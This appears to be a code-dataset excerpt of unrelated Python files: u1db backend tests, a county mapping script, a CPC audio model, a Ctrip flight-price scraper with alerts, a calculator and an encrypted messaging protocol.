exc.return_docs(return_doc_cb)\n self.assertEqual((doc1, 1), returned[0][:-1])\n\n def test_sync_exchange_doc_ids(self):\n doc1 = self.db.create_doc(tests.simple_doc, doc_id='doc-1')\n db2 = c_backend_wrapper.CDatabase(':memory:')\n doc2 = db2.create_doc(tests.nested_doc, doc_id='doc-2')\n returned = []\n\n def return_doc_cb(doc, gen, trans_id):\n returned.append((doc, gen, trans_id))\n\n val = self.st.sync_exchange_doc_ids(\n db2, [(doc2.doc_id, 1, 'T-sid')], 0, return_doc_cb)\n last_trans_id = self.db._get_transaction_log()[-1][1]\n self.assertEqual(2, self.db._get_generation())\n self.assertEqual((2, last_trans_id), val)\n self.assertGetDoc(self.db, doc2.doc_id, doc2.rev, tests.nested_doc,\n False)\n self.assertEqual((doc1, 1), returned[0][:-1])\n\n\nclass TestCHTTPSyncTarget(BackendTests):\n\n def test_format_sync_url(self):\n target = c_backend_wrapper.create_http_sync_target(\"http://base_url\")\n self.assertEqual(\"http://base_url/sync-from/replica-uid\",\n c_backend_wrapper._format_sync_url(target, \"replica-uid\"))\n\n def test_format_sync_url_escapes(self):\n # The base_url should not get munged (we assume it is already a\n # properly formed URL), but the replica-uid should get properly escaped\n target = c_backend_wrapper.create_http_sync_target(\n \"http://host/base%2Ctest/\")\n self.assertEqual(\"http://host/base%2Ctest/sync-from/replica%2Cuid\",\n c_backend_wrapper._format_sync_url(target, \"replica,uid\"))\n\n def test_format_refuses_non_http(self):\n db = c_backend_wrapper.CDatabase(':memory:')\n target = db.get_sync_target()\n self.assertRaises(RuntimeError,\n c_backend_wrapper._format_sync_url, target, 'replica,uid')\n\n def test_oauth_credentials(self):\n target = c_backend_wrapper.create_oauth_http_sync_target(\n \"http://host/base%2Ctest/\",\n 'consumer-key', 'consumer-secret', 'token-key', 'token-secret')\n auth = c_backend_wrapper._get_oauth_authorization(target,\n \"GET\", \"http://host/base%2Ctest/sync-from/abcd-efg\")\n self.assertIsNot(None, auth)\n self.assertTrue(auth.startswith('Authorization: OAuth realm=\"\", '))\n self.assertNotIn('http://host/base', auth)\n self.assertIn('oauth_nonce=\"', auth)\n self.assertIn('oauth_timestamp=\"', auth)\n self.assertIn('oauth_consumer_key=\"consumer-key\"', auth)\n self.assertIn('oauth_signature_method=\"HMAC-SHA1\"', auth)\n self.assertIn('oauth_version=\"1.0\"', auth)\n self.assertIn('oauth_token=\"token-key\"', auth)\n self.assertIn('oauth_signature=\"', auth)\n\n\nclass TestSyncCtoHTTPViaC(tests.TestCaseWithServer):\n\n server_def = staticmethod(http_server_def)\n\n def setUp(self):\n super(TestSyncCtoHTTPViaC, self).setUp()\n if c_backend_wrapper is None:\n self.skipTest(\"The c_backend_wrapper could not be imported\")\n self.startServer()\n\n def test_trivial_sync(self):\n mem_db = self.request_state._create_database('test.db')\n mem_doc = mem_db.create_doc(tests.nested_doc)\n url = self.getURL('test.db')\n target = c_backend_wrapper.create_http_sync_target(url)\n db = c_backend_wrapper.CDatabase(':memory:')\n doc = db.create_doc(tests.simple_doc)\n c_backend_wrapper.sync_db_to_target(db, target)\n self.assertGetDoc(mem_db, doc.doc_id, doc.rev, doc.get_json(), False)\n self.assertGetDoc(db, mem_doc.doc_id, mem_doc.rev, mem_doc.get_json(),\n False)\n\n\nclass TestSyncCtoOAuthHTTPViaC(tests.TestCaseWithServer):\n\n server_def = staticmethod(oauth_http_server_def)\n\n def setUp(self):\n super(TestSyncCtoOAuthHTTPViaC, self).setUp()\n if c_backend_wrapper is None:\n self.skipTest(\"The c_backend_wrapper could not be imported\")\n self.startServer()\n\n def test_trivial_sync(self):\n mem_db = self.request_state._create_database('test.db')\n mem_doc = mem_db.create_doc(tests.nested_doc)\n url = self.getURL('~/test.db')\n target = c_backend_wrapper.create_oauth_http_sync_target(url,\n tests.consumer1.key, tests.consumer1.secret,\n tests.token1.key, tests.token1.secret)\n db = c_backend_wrapper.CDatabase(':memory:')\n doc = db.create_doc(tests.simple_doc)\n c_backend_wrapper.sync_db_to_target(db, target)\n self.assertGetDoc(mem_db, doc.doc_id, doc.rev, doc.get_json(), False)\n self.assertGetDoc(db, mem_doc.doc_id, mem_doc.rev, mem_doc.get_json(),\n False)\n\n\nclass TestVectorClock(BackendTests):\n\n def create_vcr(self, rev):\n return c_backend_wrapper.VectorClockRev(rev)\n\n def test_parse_empty(self):\n self.assertEqual('VectorClockRev()',\n repr(self.create_vcr('')))\n\n def test_parse_invalid(self):\n self.assertEqual('VectorClockRev(None)',\n repr(self.create_vcr('x')))\n self.assertEqual('VectorClockRev(None)',\n repr(self.create_vcr('x:a')))\n self.assertEqual('VectorClockRev(None)',\n repr(self.create_vcr('y:1|x:a')))\n self.assertEqual('VectorClockRev(None)',\n repr(self.create_vcr('x:a|y:1')))\n self.assertEqual('VectorClockRev(None)',\n repr(self.create_vcr('y:1|x:2a')))\n self.assertEqual('VectorClockRev(None)',\n repr(self.create_vcr('y:1||')))\n self.assertEqual('VectorClockRev(None)',\n repr(self.create_vcr('y:1|')))\n self.assertEqual('VectorClockRev(None)',\n repr(self.create_vcr('y:1|x:2|')))\n self.assertEqual('VectorClockRev(None)',\n repr(self.create_vcr('y:1|x:2|:')))\n self.assertEqual('VectorClockRev(None)',\n repr(self.create_vcr('y:1|x:2|m:')))\n self.assertEqual('VectorClockRev(None)',\n repr(self.create_vcr('y:1|x:|m:3')))\n self.assertEqual('VectorClockRev(None)',\n repr(self.create_vcr('y:1|:|m:3')))\n\n def test_parse_single(self):\n self.assertEqual('VectorClockRev(test:1)',\n repr(self.create_vcr('test:1')))\n\n def test_parse_multi(self):\n self.assertEqual('VectorClockRev(test:1|z:2)',\n repr(self.create_vcr('test:1|z:2')))\n self.assertEqual('VectorClockRev(ab:1|bc:2|cd:3|de:4|ef:5)',\n repr(self.create_vcr('ab:1|bc:2|cd:3|de:4|ef:5')))\n self.assertEqual('VectorClockRev(a:2|b:1)',\n repr(self.create_vcr('b:1|a:2')))\n\n\nclass TestCDocument(BackendTests):\n\n def make_document(self, *args, **kwargs):\n return c_backend_wrapper.make_document(*args, **kwargs)\n\n def test_create(self):\n self.make_document('doc-id', 'uid:1', tests.simple_doc)\n\n def assertPyDocEqualCDoc(self, *args, **kwargs):\n cdoc = self.make_document(*args, **kwargs)\n pydoc = Document(*args, **kwargs)\n self.assertEqual(pydoc, cdoc)\n self.assertEqual(cdoc, pydoc)\n\n def test_cmp_to_pydoc_equal(self):\n self.assertPyDocEqualCDoc('doc-id', 'uid:1', tests.simple_doc)\n self.assertPyDocEqualCDoc('doc-id', 'uid:1', tests.simple_doc,\n has_conflicts=False)\n self.assertPyDocEqualCDoc('doc-id', 'uid:1', tests.simple_doc,\n has_conflicts=True)\n\n def test_cmp_to_pydoc_not_equal_conflicts(self):\n cdoc = self.make_document('doc-id', 'uid:1', tests.simple_doc)\n pydoc = Document('doc-id', 'uid:1', tests.simple_doc,\n has_conflicts=True)\n self.assertNotEqual(cdoc, pydoc)\n self.assertNotEqual(pydoc, cdoc)\n\n def test_cmp_to_pydoc_not_equal_doc_id(self):\n cdoc = self.make_document('doc-id', 'uid:1', tests.simple_doc)\n pydoc = Document('doc2-id', 'uid:1', tests.simple_doc)\n self.assertNotEqual(cdoc, pydoc)\n self.assertNotEqual(pydoc, cdoc)\n\n def test_cmp_to_pydoc_not_equal_doc_rev(self):\n cdoc = self.make_document('doc-id', 'uid:1', tests.simple_doc)\n pydoc = Document('doc-id', 'uid:2', tests.simple_doc)\n self.assertNotEqual(cdoc, pydoc)\n self.assertNotEqual(pydoc, cdoc)\n\n def test_cmp_to_pydoc_not_equal_content(self):\n cdoc = self.make_document('doc-id', 'uid:1', tests.simple_doc)\n pydoc = Document('doc-id', 'uid:1', tests.nested_doc)\n self.assertNotEqual(cdoc, pydoc)\n self.assertNotEqual(pydoc, cdoc)\n\n\nclass TestUUID(BackendTests):\n\n def test_uuid4_conformance(self):\n uuids = set()\n for i in range(20):\n uuid = c_backend_wrapper.generate_hex_uuid()\n self.assertIsInstance(uuid, str)\n self.assertEqual(32, len(uuid))\n # This will raise ValueError if it isn't a valid hex string\n long(uuid, 16)\n # Version 4 uuids have 2 other requirements, the high 4 bits of the\n # seventh byte are always '0x4', and the middle bits of byte 9 are\n # always set\n self.assertEqual('4', uuid[12])\n self.assertTrue(uuid[16] in '89ab')\n self.assertTrue(uuid not in uuids)\n uuids.add(uuid)\n","repo_name":"Kazade/Tasks","sub_path":"u1dbrepo/u1db/tests/test_c_backend.py","file_name":"test_c_backend.py","file_ext":"py","file_size_in_byte":23744,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"21880953033","text":"from pathlib import Path\ndata_folder = Path('C:/Users/langzx/Desktop/github/DCM')\n#data_folder = Path('/Users/ellelang/Documents/github/DCM/data')\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport altair as alt\nfrom vega_datasets import data\nimport geopandas as gpd\nfrom geopandas import GeoSeries, GeoDataFrame\n\n\ndata_folder = Path('C:/Users/langzx/Desktop/github/DCM')\n#data_folder = Path('/Users/ellelang/Documents/github/DCM')\nMRB = gpd.read_file(data_folder/\"shapefilesMRB/3statesMRBclipped1.shp\")\nMRB.crs\nMRB.plot(color='white', edgecolor='grey')\nMRB.columns\nMRB.NAME \n\nMRB.loc[(MRB.STATE_NAME == 'South Dakota')&(MRB.NAME == 'Grant'), 'NAME'] = 'Grant_sd'\n\n#MRB = MRB.loc[MRB['STATE_NAME'] == 'Minnesota']\n\n\ncost_counties = pd.read_csv(data_folder/\"data/cost_region1027.csv\")\nMRB_counties = pd.merge(MRB, cost_counties,how='left',left_on='NAME', right_on='County')\nMRB_counties.columns\n#len(MRB_counties.geometry)\n# regionname = cost.Region.unique().tolist()\n# regionname_sort = ['Northeast',\n# 'Northwest',\n# 'Westcentral',\n# 'Southcentral',\n# 'Southwest',\n# 'Iowa',\n# 'South Dakota'\n# ]\nairports = data.airports.url\nairports\npoints = alt.Chart(airports).transform_aggregate(\n latitude='mean(latitude)',\n longitude='mean(longitude)',\n count='count()',\n groupby=['state']\n)\npoints.show()\n\n\nstates = alt.topo_feature(MRB_counties, feature='STATE_NAME')\n\nbackground = alt.Chart(MRB_counties).mark_geoshape(\n fill='lightgray',\n stroke='white'\n).properties(\n width=500,\n height=300\n).project('albersUsa')\n\nbackground.show()\n\n\n\ndf1 = cost.melt(id_vars=['County'], \n value_vars=['WLD', 'CC', 'NM', 'ASC_obs'],\n var_name='Types', value_name='WTAs')\n\ndf1.head(3)\nalt.renderers.enable('altair_viewer')\nbar = alt.Chart(df1).mark_bar().encode(\n x='County',\n y='WTAs',\n color='Types'\n )\n\nbar.show()\ndf2 = pd.merge(df1, MRB, how='left', left_on='County', right_on='NAME')\ndf2.lon\ndf2.columns\n\nbackground + bars\n\n\n\n\ndf2 = df2[['County', 'Types' ,'WTAs','lat','lon']]\n# airport positions on background\npoints = alt.Chart(df2).transform_aggregate(\n latitude='mean(lat)',\n longitude='mean(lon)',\n count='count()',\n groupby=['County']\n).mark_circle().encode(\n longitude='longitude:Q',\n latitude='latitude:Q',\n size=alt.Size('count:Q', title='Number of Airports'),\n color=alt.value('steelblue'),\n tooltip=['County:N','count:Q']\n).properties(\n title='Number of airports in US'\n)\npoints.show()\n\n\nbars = alt.Chart(df2).transform_aggregate(\n latitude='mean(lat)',\n longitude='mean(lon)',\n groupby=['County'],\n totalwta = 'sum(WTAs)'\n).mark_circle(size=78).encode(\n longitude='longitude:Q',\n latitude='latitude:Q',\n color='totalwta:Q',\n \n #color=alt.value('steelblue'),\n tooltip=['County:N','totalwta:Q']\n).properties(\n title='Counties WTAs (WLD+CC+NM+ASC)'\n)\n\n#bars.show()\n\ntotal = background + bars \ntotal.show()\n\n\n\nmark_bar().encode(\n longitude='longitude:Q',\n latitude='latitude:Q',\n x='County',\n y='WTAs' \n )\n\nbars.show()\n","repo_name":"ellelang/DCM","sub_path":"code/python/spatialtry.py","file_name":"spatialtry.py","file_ext":"py","file_size_in_byte":3112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"26863640042","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass IDModule(nn.Module):\n def __init__(self, *args, **kwargs):\n super(IDModule, self).__init__()\n\n def forward(self, x):\n return x\n\n\nclass ChannelNorm(nn.Module):\n def __init__(self, numFeatures, epsilon=1e-05, affine=True):\n super(ChannelNorm, self).__init__()\n if affine:\n self.weight = nn.parameter.Parameter(torch.Tensor(1, numFeatures, 1))\n self.bias = nn.parameter.Parameter(torch.Tensor(1, numFeatures, 1))\n else:\n self.weight = None\n self.bias = None\n self.epsilon = epsilon\n self.p = 0\n self.affine = affine\n self.reset_parameters()\n\n def reset_parameters(self):\n if self.affine:\n torch.nn.init.ones_(self.weight)\n torch.nn.init.zeros_(self.bias)\n\n def forward(self, x):\n cumMean = x.mean(dim=1, keepdim=True)\n cumVar = x.var(dim=1, keepdim=True)\n x = (x - cumMean) * torch.rsqrt(cumVar + self.epsilon)\n\n if self.weight is not None:\n x = x * self.weight + self.bias\n return x\n\n\nclass CPCEncoder(nn.Module):\n def __init__(self, sizeHidden=512, normMode=\"layerNorm\"):\n super(CPCEncoder, self).__init__()\n\n validModes = [\"batchNorm\", \"instanceNorm\", \"ID\", \"layerNorm\"]\n if normMode not in validModes:\n raise ValueError(f\"Norm mode must be in {validModes}\")\n\n if normMode == \"instanceNorm\":\n\n def normLayer(x):\n return nn.InstanceNorm1d(x, affine=True)\n\n elif normMode == \"ID\":\n normLayer = IDModule\n elif normMode == \"layerNorm\":\n normLayer = ChannelNorm\n else:\n normLayer = nn.BatchNorm1d\n\n self.dimEncoded = sizeHidden\n self.conv0 = nn.Conv1d(1, sizeHidden, 10, stride=5, padding=3)\n self.batchNorm0 = normLayer(sizeHidden)\n self.conv1 = nn.Conv1d(sizeHidden, sizeHidden, 8, stride=4, padding=2)\n self.batchNorm1 = normLayer(sizeHidden)\n self.conv2 = nn.Conv1d(sizeHidden, sizeHidden, 4, stride=2, padding=1)\n self.batchNorm2 = normLayer(sizeHidden)\n self.conv3 = nn.Conv1d(sizeHidden, sizeHidden, 4, stride=2, padding=1)\n self.batchNorm3 = normLayer(sizeHidden)\n self.conv4 = nn.Conv1d(sizeHidden, sizeHidden, 4, stride=2, padding=1)\n self.batchNorm4 = normLayer(sizeHidden)\n self.DOWNSAMPLING = 160\n\n def getDimOutput(self):\n return self.conv4.out_channels\n\n def forward(self, x):\n x = F.relu(self.batchNorm0(self.conv0(x)))\n x = F.relu(self.batchNorm1(self.conv1(x)))\n x = F.relu(self.batchNorm2(self.conv2(x)))\n x = F.relu(self.batchNorm3(self.conv3(x)))\n x = F.relu(self.batchNorm4(self.conv4(x)))\n return x\n\n\nclass CPCAR(nn.Module):\n def __init__(\n self, dimEncoded, dimOutput, keepHidden, nLevelsGRU, mode=\"GRU\", reverse=False\n ):\n super(CPCAR, self).__init__()\n self.RESIDUAL_STD = 0.1\n\n if mode == \"LSTM\":\n self.baseNet = nn.LSTM(\n dimEncoded, dimOutput, num_layers=nLevelsGRU, batch_first=True\n )\n elif mode == \"RNN\":\n self.baseNet = nn.RNN(\n dimEncoded, dimOutput, num_layers=nLevelsGRU, batch_first=True\n )\n else:\n self.baseNet = nn.GRU(\n dimEncoded, dimOutput, num_layers=nLevelsGRU, batch_first=True\n )\n\n self.hidden = None\n self.keepHidden = keepHidden\n self.reverse = reverse\n\n def getDimOutput(self):\n return self.baseNet.hidden_size\n\n def forward(self, x):\n if self.reverse:\n x = torch.flip(x, [1])\n try:\n self.baseNet.flatten_parameters()\n except RuntimeError:\n pass\n x, h = self.baseNet(x, self.hidden)\n if self.keepHidden:\n if isinstance(h, tuple):\n self.hidden = tuple(x.detach() for x in h)\n else:\n self.hidden = h.detach()\n\n # For better modularity, a sequence's order should be preserved\n # by each module\n if self.reverse:\n x = torch.flip(x, [1])\n return x\n\n\nclass CPCModel(nn.Module):\n def __init__(self, encoder, AR):\n super(CPCModel, self).__init__()\n self.gEncoder = encoder\n self.gAR = AR\n\n def forward(self, batchData, label):\n encodedData = self.gEncoder(batchData).permute(0, 2, 1)\n cFeature = self.gAR(encodedData)\n return cFeature, encodedData, label\n","repo_name":"neurocode-ai/neurocode","sub_path":"neurocode/models/cpc.py","file_name":"cpc.py","file_ext":"py","file_size_in_byte":4624,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"41298817571","text":"import argparse\nfrom collections import defaultdict\nfrom lxml import etree\nfrom time import sleep\nfrom datetime import date, datetime, timedelta\nimport urllib3\nimport requests as r\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.chrome.options import Options\n\noptions = Options()\n# 设置 webdriver 无头运行\noptions.add_argument('--headless')\noptions.add_argument('--disable-gpu')\noptions.add_argument('--no-sandbox')\n# 初始化 webdriver\n# driver = webdriver.Chrome(\n# executable_path=\"./drivers/chromedriver.exe\",\n# chrome_options=chrome_options,\n# )\n\nWECHAT_MSG_URL = 'https://sctapi.ftqq.com/xxx.send'\nSEND_COUNT = 5\n# 屏蔽 https 证书报警信息\nurllib3.disable_warnings()\n\n# 定义 session 请求头,设置 UA\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1'\n}\n\n# 定义异常数量全局变量\nEXCEPTION_COUNT = 0\n# 定义异常最大值全局变量\nMAX_EXCEPTION_COUNT = 1000\n\nparser = argparse.ArgumentParser(description='manual to this script')\nparser.add_argument(\"-leave\", type=str, default=\"SHA\")\nparser.add_argument(\"-reach\", type=str, default=\"CTU\")\nparser.add_argument(\"-date\", type=str, default=\"2022-01-28\")\nparser.add_argument(\"-price\", type=float, default=0)\nargs = parser.parse_args()\n\nLEAVE_LOCATION = args.leave.upper()\nREACH_LOCATION = args.reach.upper()\nTARGET_DATE = [int(x) for x in args.date.split('-')]\nTARGET_PRICE = args.price\nDATE_LIST = [str(date(*TARGET_DATE))] + [\n str(date(*TARGET_DATE) + timedelta(days=x)) for x in (-1, 1)\n]\n\nresult = defaultdict(list)\n# mention_list = defaultdict(list)\n\n# 记录抓取异常\ndef record_exception_count(err):\n print(err)\n global EXCEPTION_COUNT\n EXCEPTION_COUNT += 1\n # 抓取异常次数达到最大值时抛出异常\n if EXCEPTION_COUNT > MAX_EXCEPTION_COUNT:\n print(\"exceed max exception count\")\n raise RuntimeError\n\n\n# 初始化 chromedriver 获取首页 cookie\ndef init_driver(date, driver):\n driver.get(\n f\"https://m.ctrip.com/html5/flight/swift/domestic/{LEAVE_LOCATION}/{REACH_LOCATION}/{date}\"\n )\n\n try:\n # waitting for alert dialog.\n WebDriverWait(driver, 10).until(\n EC.presence_of_element_located(\n (By.XPATH, '//*[@id=\"app\"]/div/div[1]/div/div[2]/div[2]/ul/li/div')\n )\n )\n\n btn_known = driver.find_element_by_xpath(\n '//*[@id=\"app\"]/div/div[1]/div/div[2]/div[2]/ul/li/div/div[4]/div'\n )\n btn_known.click()\n except:\n pass\n\n # scroll to bottom of the page\n sleep(5)\n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n sleep(5)\n return driver.page_source\n\n\ndef parse_html(date, html, mention_list):\n selector = etree.HTML(html)\n card_list = selector.xpath('//div[@class=\"card-item-content\"]')\n min_price = [999999, 999999, 999999]\n min_three = []\n print(datetime.now(), date, len(card_list))\n for card in card_list:\n try:\n depart_node = card.xpath('div//div[@class=\"flight-depart\"]')[0]\n dest_node = card.xpath('div//div[@class=\"flight-dest\"]')[0]\n price_node = card.xpath('div//div[@class=\"flight-price\"]')[0]\n plane_node = card.xpath('div[@class=\"flight-plane\"]//span/text()')\n middle_node = card.xpath(\n 'div/div/div//span[@class=\"icon-arrow-state\"]//span/text()'\n )\n rest_ticket = price_node.xpath('div/span[@class=\"ticket-inventory\"]/text()')\n except Exception as err:\n record_exception_count(err)\n continue\n\n price = float(price_node.xpath('div[1]/strong/text()')[0])\n if price and price > TARGET_PRICE * 2:\n continue\n data = {\n 'depart_time': depart_node.xpath('div[@class=\"flight-time\"]/text()')[\n 0\n ].strip(),\n 'depart_airport': '-'.join(\n depart_node.xpath('div[@class=\"flight-airport\"]/span/text()')\n ),\n 'dest_time': dest_node.xpath('div[@class=\"flight-time\"]/text()')[0].strip(),\n 'dest_airport': '-'.join(\n [x.strip() for x in dest_node.xpath('div[2]/span/text()') if x.strip()]\n ),\n 'middle': '-'.join(middle_node),\n 'price': str(price),\n 'rest_ticket': str(rest_ticket and rest_ticket[0].strip()),\n 'discount': price_node.xpath('div[2]/text()')[0].strip()\n if price_node.xpath('div[2]/text()')\n else price_node.xpath('div[2]//span[@class=\"ticket-right\"]/text()')[\n 0\n ].strip(),\n 'airplane': str([x.strip() for x in plane_node if x.strip()]),\n }\n # result[date].append(data)\n if price <= TARGET_PRICE:\n mention_list[date].append(data)\n if price < min_price[0]:\n min_price.insert(0, price)\n min_three.insert(0, data)\n elif price < min_price[1]:\n min_price.insert(1, price)\n min_three.insert(1, data)\n elif price < min_price[2]:\n min_price.insert(2, price)\n min_three.insert(2, data)\n min_price = min_price[:3]\n min_three = min_three[:3]\n if not (mention_list[date] or TARGET_PRICE):\n mention_list[date] = min_three\n\n\ndef run_spider():\n driver = webdriver.Chrome(\n executable_path=\"./drivers/chromedriver_linux\", options=options\n # executable_path=\"./drivers/chromedriver\", options=options\n )\n mention_list = defaultdict(list)\n for _date in DATE_LIST:\n page_html = init_driver(_date, driver)\n parse_html(_date, page_html, mention_list)\n sleep(10)\n driver.quit()\n global SEND_COUNT\n table_data = []\n for _date, lines in mention_list.items():\n for line in lines:\n table_data.append(f\"| {_date} | { ' | '.join(line.values()) } |\")\n if not table_data:\n return\n today = str(date.today())\n with open('record', 'r') as fs:\n record = fs.read()\n if str({today: mention_list}) == record:\n return\n with open('record', 'w') as fs:\n fs.write(str({today: mention_list}))\n r.post(\n WECHAT_MSG_URL,\n params={\n 'title': '有新的航班可以购入',\n 'desp': \"\"\"\n| Date | depart_time | depart_airport | dest_time | dest_airport | middle | price | rest_ticket | discount | airplane |\n| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |\n{}\n\"\"\".format(\n '\\n'.join(table_data)\n ),\n 'channel': 9,\n },\n )\n SEND_COUNT -= 1\n\n\ndef time_scheduler():\n global SEND_COUNT\n\n while True:\n if 23 > datetime.now().hour > 8:\n if SEND_COUNT:\n run_spider()\n sleep(30 * 60)\n continue\n print(\"day off\")\n SEND_COUNT = 5\n sleep(30 * 60)\n\n\nif __name__ == '__main__':\n time_scheduler()\n","repo_name":"KrisShin/ctrip_mention","sub_path":"ctrip_spider.py","file_name":"ctrip_spider.py","file_ext":"py","file_size_in_byte":7201,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"14065483525","text":"from Stack import Solution\nimport sys\n\ndef main():\n calculator = Solution()\n for expression in sys.stdin:\n try:\n if expression == 'exit\\n':\n return 0\n \n result = calculator.calculate(expression)\n print(result)\n except:\n print(\"Wrong Expression.\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"yichigo/Algorithms","sub_path":"Calculator.py","file_name":"Calculator.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"16268496686","text":"import struct\nfrom abc import ABC, abstractmethod\nfrom enum import Enum\nfrom typing import Iterable, Tuple\n\nfrom cryptography.exceptions import InvalidSignature\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.hazmat.primitives.asymmetric import padding\n\n\nclass Message:\n author_public_key: None\n message: bytes\n verified: bool\n\n @staticmethod\n def construct(message: bytes, recipient_public_key, author_private_key) -> bytes:\n encrypted_message = recipient_public_key.encrypt(\n message,\n padding.OAEP(\n mgf=padding.MGF1(algorithm=hashes.SHA256()),\n algorithm=hashes.SHA256(),\n label=None,\n ),\n )\n\n signature = author_private_key.sign(\n message,\n padding.PSS(\n mgf=padding.MGF1(algorithm=hashes.SHA256()),\n salt_length=padding.PSS.MAX_LENGTH\n ),\n hashes.SHA256(),\n )\n signature_len = len(signature)\n message_len = len(encrypted_message)\n signed_message = struct.pack(f\"!I{signature_len}s{message_len}s\", signature_len, signature, encrypted_message)\n return signed_message\n\n @classmethod\n def deconstruct(cls, signed_message: bytes, author_public_key, recipient_private_key) -> 'Message':\n current_pos = 0\n signature_len = struct.unpack(\"!I\", signed_message[current_pos: current_pos + 4])[0]\n current_pos += 4\n signature = struct.unpack(f\"!{signature_len}s\", signed_message[current_pos: current_pos + signature_len])[0]\n current_pos += signature_len\n encrypted_message = signed_message[current_pos:]\n\n message = recipient_private_key.decrypt(\n encrypted_message,\n padding.OAEP(\n mgf=padding.MGF1(algorithm=hashes.SHA256()),\n algorithm=hashes.SHA256(),\n label=None,\n )\n )\n\n try:\n author_public_key.verify(\n signature,\n message,\n padding.PSS(\n mgf=padding.MGF1(hashes.SHA256()),\n salt_length=padding.PSS.MAX_LENGTH,\n ),\n hashes.SHA256(),\n )\n except InvalidSignature:\n obj = cls()\n obj.message = None\n obj.verified = False\n return obj\n\n obj = cls()\n obj.message = message\n obj.verified = True\n obj.author_public_key = author_public_key\n return obj\n\n\nclass InteractionType(Enum):\n REQUEST = 1\n RESPONSE = 2\n\n\nclass CommandType(Enum):\n SEND_MESSAGE = 1\n GET_CLIENTS = 2\n GET_MESSAGES = 3\n\n\nclass Command(ABC):\n @abstractmethod\n def to_bytes(self) -> bytes:\n pass\n\n @classmethod\n @abstractmethod\n def from_bytes(\n cls, interaction_type: InteractionType, data_bytes: bytes\n ) -> \"Command\":\n pass\n\n\ndef command_type(_type: CommandType):\n if _type in Protocol._COMMAND_FACTORY:\n raise ValueError(\n f\"{_type} is already set for {Protocol._COMMAND_FACTORY[_type]}\"\n )\n\n def decorator(cls):\n Protocol._COMMAND_FACTORY[_type] = cls\n return cls\n\n return decorator\n\n\nclass Protocol(Command):\n _COMMAND_FACTORY = {}\n\n def __init__(self, command: CommandType, info: Command, public_key: str, salt: int):\n self.command = command\n self.info = info\n self.public_key = public_key\n self.salt = salt\n\n def to_bytes(self) -> bytes:\n info_bytes = self.info.to_bytes()\n public_key = self.public_key.encode()\n public_key_length = len(public_key)\n return (\n struct.pack(\n f\"!HII{public_key_length}s\",\n self.command.value,\n public_key_length,\n self.salt,\n public_key,\n )\n + info_bytes\n )\n\n @classmethod\n def from_bytes(\n cls, interaction_type: InteractionType, data_bytes: bytes\n ) -> \"Protocol\":\n current_position = 0\n command_type_number = struct.unpack(\"!H\", data_bytes[current_position:2])[0]\n current_position += 2\n public_key_length, salt = struct.unpack(\n \"!II\", data_bytes[current_position : current_position + 8]\n )\n current_position += 8\n public_key = struct.unpack(\n f\"!{public_key_length}s\",\n data_bytes[current_position : current_position + public_key_length],\n )[0]\n current_position += public_key_length\n info_bytes = data_bytes[current_position:]\n\n command_type = CommandType(command_type_number)\n command_class: Command = cls._COMMAND_FACTORY.get(command_type)\n info = command_class.from_bytes(interaction_type, info_bytes)\n return Protocol(command_type, info, public_key.decode(), salt)\n\n\n@command_type(CommandType.SEND_MESSAGE)\nclass SendMessageCommand(Command):\n def __init__(self, message: bytes, recipient):\n self.message = message\n self.recipient = recipient\n\n def to_bytes(self) -> bytes:\n recipient = self.recipient.encode()\n message_len = len(self.message)\n recipient_len = len(recipient)\n return struct.pack(\n f\"!II{recipient_len}s{message_len}s\",\n recipient_len,\n message_len,\n recipient,\n self.message,\n )\n\n @classmethod\n def from_bytes(\n cls, interaction_type: InteractionType, data_bytes\n ) -> \"SendMessageCommand\":\n recipient_len, message_len = struct.unpack(\"!II\", data_bytes[:8])\n recipient, message = struct.unpack(\n f\"!{recipient_len}s{message_len}s\", data_bytes[8:]\n )\n return cls(message, recipient.decode())\n\n\n@command_type(CommandType.GET_CLIENTS)\nclass GetClientsCommand(Command):\n def __init__(\n self, interaction_type: InteractionType, clients: Iterable[str] = None\n ):\n self._interaction_type = interaction_type\n self.clients = clients or []\n\n def to_bytes(self) -> bytes:\n if self._interaction_type == InteractionType.REQUEST:\n return b\"\"\n encoded_clients = []\n for client in self.clients:\n client_length = len(client)\n encoded_clients.append(\n struct.pack(f\"!I{client_length}s\", client_length, client.encode())\n )\n\n return struct.pack(\"!I\", len(self.clients)) + b\"\".join(encoded_clients)\n\n @classmethod\n def from_bytes(\n cls, interaction_type: InteractionType, data_bytes: bytes\n ) -> \"GetClientsCommand\":\n if interaction_type == InteractionType.REQUEST:\n return cls(interaction_type=InteractionType.REQUEST)\n current_position = 0\n clients_number = struct.unpack(\n \"!I\", data_bytes[current_position : current_position + 4]\n )[0]\n current_position += 4\n clients = []\n for i in range(clients_number):\n client_length = struct.unpack(\n \"!I\", data_bytes[current_position : current_position + 4]\n )[0]\n current_position += 4\n client = struct.unpack(\n f\"!{client_length}s\",\n data_bytes[current_position : current_position + client_length],\n )[0]\n current_position += client_length\n clients.append(client.decode())\n return cls(interaction_type=InteractionType.RESPONSE, clients=clients)\n\n\n@command_type(CommandType.GET_MESSAGES)\nclass GetMessagesCommand(Command):\n def __init__(\n self,\n interaction_type: InteractionType,\n messages: Iterable[Tuple[bytes, str]] = None,\n ):\n self.interaction_type = interaction_type\n self.messages = messages or []\n\n def to_bytes(self) -> bytes:\n if self.interaction_type == 